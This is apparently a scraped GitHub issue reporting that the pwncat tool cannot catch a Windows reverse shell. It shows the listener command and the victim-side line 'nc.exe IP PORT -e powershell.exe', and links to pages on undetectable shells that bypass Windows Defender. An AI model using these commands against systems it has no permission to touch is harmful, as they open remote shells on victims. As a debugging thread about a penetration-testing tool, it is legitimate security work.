Unable to establish reverse shell on windows
See original GitHub issueBug Description
I am unsure if this is a bug or it is not supported by pwncat, so I am posting this to clarify and check. I am unable to establish a reverse shell from any windows machine with nc.exe.
pwncat version
Docker pwncat build from git repo
0.4.3
Target System (aka “victim”)
Most windows machine that I have tried. In my own VM that I tested, it was windows 10 Educational version 1903 build 18362.239
Steps to Reproduce
Steps to reproduce the behavior:
- pwncat -lp 4444 -m windows (attacker machine)
- nc.exe IP PORT -e powershell.exe (windows victim)
Expected Behavior
pwncat should be able to establish reverse shell
Screenshots
Issue Analytics
- State:
- Created 2 years ago
- Comments:13 (8 by maintainers)
Top Results From Across the Web
How to Create Undetectable Windows Reverse Shell using ...
How to Create Undetectable Windows Reverse Shell using HoaxShell to bypass Windows Defender ... Your browser can't play this video.
Read more >Windows 64-bit Reverse TCP Shell not working
If you are trying to get a reverse shell is because you have some kind of RCE. If you have elevated privileges then...
Read more >Payloads can't establish reverse shell/meterpreter back to ...
I was able to create payloads as exe files and run on my test windows machine. On the msfconsole of actacking machine will...
Read more >Get Reverse-shell via Windows one-liner - Hacking Articles
Generally, while abusing HTTP services or other programs, we get RCE vulnerability. This loophole allows you to remotely execute any system ...
Read more >Can't connect to reverse shell – connection waits forever
You are asking for reverse shell, but Your code doesn't have any shell involved in it. Take a look at reverse shell example...
Read more >Top Related Medium Post
No results found
Top Related StackOverflow Question
No results found
Troubleshoot Live Code
Lightrun enables developers to add logs, metrics and snapshots to live code - no restarts or redeploys required.
Start FreeTop Related Reddit Thread
No results found
Top Related Hackernoon Post
No results found
Top Related Tweet
No results found
Top Related Dev.to Post
No results found
Top Related Hashnode Post
No results found
Top GitHub Comments
Hi I have tested with a normal netcat shell E.g
nc -lvnp 4444
. And this commandnc.exe IP PORT -e powershell.exe
does connect back to me with a reverse shell.However, pwncat does not connect and still errors out.
Also regarding Windows Defender service, I have tried enabling and disabling windows in both cases pwncat still doesnt want to establish reverse shell.
Not sure if it’s the same issue but got the same error when trying to connect to a windows box. Here is what I’ve used: Listener:
Reverse (powershell base64 encoded from this page):